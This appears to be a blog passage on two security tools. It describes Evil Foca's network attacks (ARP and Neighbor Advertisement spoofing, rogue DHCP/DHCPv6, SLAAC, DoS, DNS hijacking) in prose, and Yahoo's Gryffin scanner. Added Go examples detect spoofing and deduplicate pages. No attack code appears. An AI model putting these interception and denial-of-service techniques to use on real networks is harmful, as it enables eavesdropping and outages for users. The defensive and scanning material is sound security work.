  • DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
  • DNS Hijacking.


The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

Man In The Middle (MITM) attack

The well-known “Man In The Middle” is an attack in which the wrongdoer creates the possibility of reading, adding, or modifying information that is located in a channel between two terminals with neither of these noticing. Within the MITM attacks in IPv4 and IPv6 Evil Foca considers the following techniques:

ARP Spoofing: Consists of sending forged ARP messages onto the Ethernet network. Normally the objective is to associate the MAC address of the attacker with the IP address of another device. Any traffic directed to the IP address of the default gateway will then be sent to the attacker instead of its real destination.

DHCP ACK Injection: Consists of an attacker monitoring the DHCP exchanges and, at some point during the communication, sending a packet to modify their behavior. Evil Foca turns the machine into a fake DHCP server on the network.

Neighbor Advertisement Spoofing: The principle of this attack is identical to that of ARP Spoofing, the difference being that IPv6 does not use the ARP protocol; all of that information is carried in ICMPv6 packets instead. The Neighbor Discovery protocol uses five types of ICMPv6 packets, and Evil Foca generates packets of this type to place itself between the gateway and the victim.

SLAAC attack: The objective of this type of attack is to execute an MITM when a user connects to the Internet and to a server that has no IPv6 support and therefore has to be reached over IPv4. The attack is possible because Evil Foca, once it is in the communication path, performs the domain name resolution itself and is able to map IPv4 addresses into IPv6 addresses.

Fake DHCPv6 server: This attack involves the attacker posing as the DHCPv6 server, responding to all network requests and distributing IPv6 addresses and a false DNS server in order to manipulate the user's destination or deny the service.

Denial of Service (DoS) attack: A DoS attack is an attack on a system of machines or a network that results in a service or resource being inaccessible to its users. Normally it causes the loss of network connectivity by consuming the bandwidth of the victim's network, or by overloading the computing resources of the victim's system.

DoS attack in IPv4 with ARP Spoofing: This type of DoS attack consists of associating a nonexistent MAC address with an IP address in a victim's ARP table. The machine whose ARP table has been modified is then unable to reach the IP address associated with the nonexistent MAC.

DoS attack in IPv6 with SLAAC attack: In this type of attack a large number of Router Advertisement packets are generated, destined for one or several machines, announcing false routers and assigning a different IPv6 address and gateway for each router, which overwhelms the system and makes the machines unresponsive.

DNS Hijacking: The DNS Hijacking attack, or DNS kidnapping, consists of altering the resolution of the domain name system (DNS). This can be achieved with malware that alters the TCP/IP configuration of a machine so that it points to a rogue DNS server under the attacker's control, or by way of an MITM attack, in which the attacker receives the DNS requests and answers a specific request in order to direct the victim to a destination of the attacker's choosing.
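A defender-side check for the ARP Spoofing and Neighbor Advertisement Spoofing described above, written here as an added example (not Evil Foca code): it replays address-to-MAC claims from a constructed capture and flags the two symptoms both attacks produce, a gateway whose MAC changes and one MAC that claims several addresses.

```go
package main

import "fmt"

// Binding is one observed address-to-MAC claim: an ARP "is-at" reply on IPv4
// or an ICMPv6 Neighbor Advertisement on IPv6; both attacks above forge these.
type Binding struct {
	Addr, MAC string
}

// DetectSpoofing replays bindings against a learned table and flags the two
// symptoms of the MITM above: an address whose MAC changes (the gateway now
// "is-at" another host) and one MAC claiming several addresses. Added example,
// not Evil Foca code; NIC swaps or VRRP failover also trigger it (allow-list).
func DetectSpoofing(seen []Binding) []string {
	addrToMAC := map[string]string{} // last MAC seen for each address
	claimed := map[string]bool{}     // "mac addr" pairs already counted
	perMAC := map[string]int{}       // distinct addresses claimed per MAC
	var alerts []string
	for _, b := range seen {
		if prev, ok := addrToMAC[b.Addr]; ok && prev != b.MAC {
			alerts = append(alerts, fmt.Sprintf("%s moved from %s to %s", b.Addr, prev, b.MAC))
		}
		addrToMAC[b.Addr] = b.MAC
		if key := b.MAC + " " + b.Addr; !claimed[key] {
			claimed[key] = true
			if perMAC[b.MAC]++; perMAC[b.MAC] > 1 {
				alerts = append(alerts, fmt.Sprintf("%s now claims %d addresses", b.MAC, perMAC[b.MAC]))
			}
		}
	}
	return alerts
}

// SampleCapture is a constructed sequence: a legitimate gateway and host, a
// harmless re-announcement, then an attacker poisoning both sides.
var SampleCapture = []Binding{
	{"192.168.1.1", "aa:aa:aa:aa:aa:01"},  // gateway
	{"192.168.1.20", "aa:aa:aa:aa:aa:20"}, // victim host
	{"192.168.1.99", "cc:cc:cc:cc:cc:99"}, // attacker's own address
	{"192.168.1.20", "aa:aa:aa:aa:aa:20"}, // benign repeat, no alert
	{"192.168.1.1", "cc:cc:cc:cc:cc:99"},  // gateway address poisoned
	{"192.168.1.20", "cc:cc:cc:cc:cc:99"}, // victim address poisoned
}

func main() {
	for _, a := range DetectSpoofing(SampleCapture) {
		fmt.Println("ALERT:", a)
	}
}
```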

Download

~ Tuesday, 29 September 2015

Gryffin: A Large Scale Web Security Scanning Platform Project By Yahoo


Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale.

Better coverage translates to fewer false negatives. Inherent scalability translates to the capability of scanning, and supporting, a large elastic application infrastructure: simply put, the ability to scan 1000 applications today and 100,000 applications tomorrow by straightforward horizontal scaling.

Coverage

Coverage has two dimensions: one during crawl and the other during fuzzing. In the crawl phase, coverage means finding as much of the application footprint as possible. In the scan phase, while fuzzing, it means testing each part of the application in depth against the applied set of vulnerabilities.

Crawl Coverage

Today a large number of web applications are template-driven, meaning the same code or path generates millions of URLs. For a security scanner, it just needs one of the millions of URLs generated by the same code or path. Gryffin's crawler does just that.

Page Deduplication

At the heart of Gryffin is a deduplication engine that compares a new page with already seen pages. If the HTML structure of the new page is similar to those already seen, it is classified as a duplicate and not crawled further.
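The deduplication engine described above, sketched here as an added example rather than Gryffin's own code: a fingerprint of the page's HTML tag sequence (the simhash idea its TODO list mentions) compared by Hamming distance, so two pages rendered from one template with different text collide while a differently structured page does not. The scanner, shingle size and threshold are this example's assumptions.

```go
package main

import (
	"hash/fnv"
	"math/bits"
	"strings"
)

// tagSequence lists a page's tag names in order ("/p" for closing tags), dropping
// text, attributes, comments and the doctype, so pages rendered from one template
// give the same sequence. A minimal scanner for the example, not an HTML parser.
func tagSequence(markup string) (tags []string) {
	for _, chunk := range strings.Split(markup, "<")[1:] {
		tag, _, ok := strings.Cut(strings.TrimSpace(chunk), ">")
		if !ok || tag == "" || tag[0] == '!' || tag[0] == '?' {
			continue // unterminated, comment, doctype or processing instruction
		}
		if j := strings.IndexAny(tag[1:], " \t\r\n/"); j >= 0 {
			tag = tag[:j+1] // drop attributes and a self-closing slash
		}
		tags = append(tags, strings.ToLower(tag))
	}
	return tags
}

// simhash folds the FNV-1a hash of every run of three consecutive tags into one
// 64-bit fingerprint, so structurally similar pages land only a few bits apart.
func simhash(tags []string) (fp uint64) {
	var votes [64]int
	for i := 0; i+3 <= len(tags); i++ {
		h := fnv.New64a()
		h.Write([]byte(strings.Join(tags[i:i+3], ">")))
		for b, sum := 0, h.Sum64(); b < 64; b++ {
			votes[b] += int(sum>>uint(b)&1)*2 - 1 // +1 for a set bit, else -1
		}
	}
	for b, v := range votes {
		if v > 0 {
			fp |= 1 << uint(b)
		}
	}
	return fp
}

// hamming is the bit distance between two fingerprints; a crawler treats a page
// within a few bits of an already seen one as a duplicate and does not crawl it.
func hamming(a, b uint64) int { return bits.OnesCount64(a ^ b) }
```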

DOM Rendering and Navigation

A large number of applications today are rich applications. They are heavily driven by client-side JavaScript. In order to discover links and code paths in such applications, Gryffin's crawler uses PhantomJS for DOM rendering and navigation.

Scan Coverage

As Gryffin is a scanning platform, not a scanner, it does not have its own fuzzer modules, even for fuzzing common web vulnerabilities like XSS and SQL Injection.

It's not wise to reinvent the wheel where you do not have to. Gryffin at production scale at Yahoo uses open source and custom fuzzers. Some of these custom fuzzers might be open sourced in the future, and might or might not be part of the Gryffin repository.

For demonstration purposes, Gryffin comes integrated with sqlmap and arachni. It does not endorse them or any other scanner in particular.

The philosophy is to improve scan coverage by being able to fuzz for just what you need.

Scale

While Gryffin is available as a standalone package, it's primarily built for scale.

Gryffin is built on the publisher-subscriber model. Each component is either a publisher, or a subscriber, or both. This allows Gryffin to scale horizontally by simply adding more subscriber or publisher nodes.

Operating Gryffin

Prerequisites

1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
4. Arachni (for fuzzing XSS and web vulnerabilities)
5. NSQ

  • running lookupd at port 4160,4161
  • running nsqd at port 4150,4151
  • with --max-msg-size=5000000

6. Kibana and Elasticsearch, for dashboarding

  • listening for JSON over port 5000
  • Preconfigured docker image available in https://hub.docker.com/r/yukinying/elk/


Installation

go get github.com/yahoo/gryffin/...

Run

TODO

  • Mobile browser user agent
  • Preconfigured docker images
  • Redis for sharing states across machines
  • Instruction to run gryffin (distributed or standalone)
  • Documentation for html-distance
  • Implement a JSON serializable cookiejar.
  • Identify duplicate url patterns based on simhash result.


Download

~ Saturday, 26 September 2015